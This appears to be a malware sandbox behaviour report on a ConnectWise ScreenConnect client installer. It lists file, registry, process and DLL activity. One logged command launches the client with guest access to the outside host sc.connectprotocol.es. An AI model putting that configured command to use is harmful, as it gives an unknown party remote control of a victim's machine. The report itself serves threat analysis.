                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

                                  System Summary

                                  Source: tiG6Ep202n.exe PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe Code function: 8_2_04F818F0 CreateProcessAsUserW,8_2_04F818F0
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\6699fd.msi
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI9C5F.tmp
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI9C7F.tmp
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIA097.tmp
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\6699ff.msi
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}\DefaultIcon
                                  Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Windows\Installer\wix{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}.SchedServiceConfig.rmi
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)\3dcrjuoq.tmp
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)\3dcrjuoq.newcfg
                                  Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                                  Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI9C7F.tmp
                                  Source: tiG6Ep202n.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: tiG6Ep202n.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2171934486.0000000005860000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000FBF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000FBF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2150164164.0000000003140000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2173892307.0000000005C1C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2173892307.0000000005C1C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2173892307.0000000005C1C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2173892307.0000000005C1C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2172036237.0000000005880000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2172036237.0000000005880000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2172036237.0000000005880000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2199171848.00000000093E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exe.muiX vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2199171848.00000000093E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2163030125.0000000004333000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2171382078.00000000057D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenamezlib.dll2 vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenamewixca.dll\ vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.0.tiG6Ep202n.exe.b1c3d4.5.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: 0.0.tiG6Ep202n.exe.b1c3d4.5.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.0.tiG6Ep202n.exe.b1c3d4.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.0.tiG6Ep202n.exe.b1c3d4.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: classification engineClassification label: mal44.evad.winEXE@18/58@1/2
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tiG6Ep202n.exe.log
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMutant created: NULL
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exe File created: C:\Users\user\AppData\Local\Temp\ScreenConnect
                                  Source: tiG6Ep202n.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: tiG6Ep202n.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exe File read: C:\Users\user\Desktop\desktop.ini
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9606.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6723343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                  Source: tiG6Ep202n.exeReversingLabs: Detection: 26%
                                  Source: tiG6Ep202n.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                                  Source: tiG6Ep202n.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exe File read: C:\Users\user\Desktop\tiG6Ep202n.exe
                                  Source: unknownProcess created: C:\Users\user\Desktop\tiG6Ep202n.exe "C:\Users\user\Desktop\tiG6Ep202n.exe"
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi"
                                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 65BBBA74F7292B7FF205870D60C0A988 C
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9606.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6723343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3D471D2A52DB95060FC9B91DC9E4C61F
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BC39C5326F99970A8179C0B7FC0A805D E Global\MSI0000
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=sc.connectprotocol.es&p=8041&s=16dcb7ee-2b94-4a51-a426-55c28e344f1f&k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ&t=OLD-01"
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "75df5a49-a7b2-4825-b91e-9f1189beb45e" "User"
                                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "9ece94ec-15d3-44dc-8c54-6fbc056de45a" "System"
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 65BBBA74F7292B7FF205870D60C0A988 CJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3D471D2A52DB95060FC9B91DC9E4C61FJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BC39C5326F99970A8179C0B7FC0A805D E Global\MSI0000Jump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9606.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6723343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dll
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: tiG6Ep202n.exeStatic PE information: certificate valid
                                  Source: tiG6Ep202n.exeStatic file information: File size 5620136 > 1048576
                                  Source: tiG6Ep202n.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                                  Source: tiG6Ep202n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: tiG6Ep202n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: tiG6Ep202n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: tiG6Ep202n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: tiG6Ep202n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: tiG6Ep202n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: tiG6Ep202n.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: tiG6Ep202n.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: tiG6Ep202n.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: tiG6Ep202n.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.4024496608.0000000002147000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: tiG6Ep202n.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.4011949358.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258615488.0000000002841000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258312922.00000000026A2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2257943532.0000000002620000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: tiG6Ep202n.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2194187109.0000000000B5D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: tiG6Ep202n.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2168361518.0000000004D40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: tiG6Ep202n.exe, MSI9C5F.tmp.3.dr, 6699ff.msi.3.dr, MSI9C7F.tmp.3.dr, 6699fe.rbs.3.dr, 6699fd.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, MSIA097.tmp.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: tiG6Ep202n.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.4024496608.0000000002147000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: tiG6Ep202n.exe, 6699ff.msi.3.dr, 6699fd.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, MSI9606.tmp.2.dr
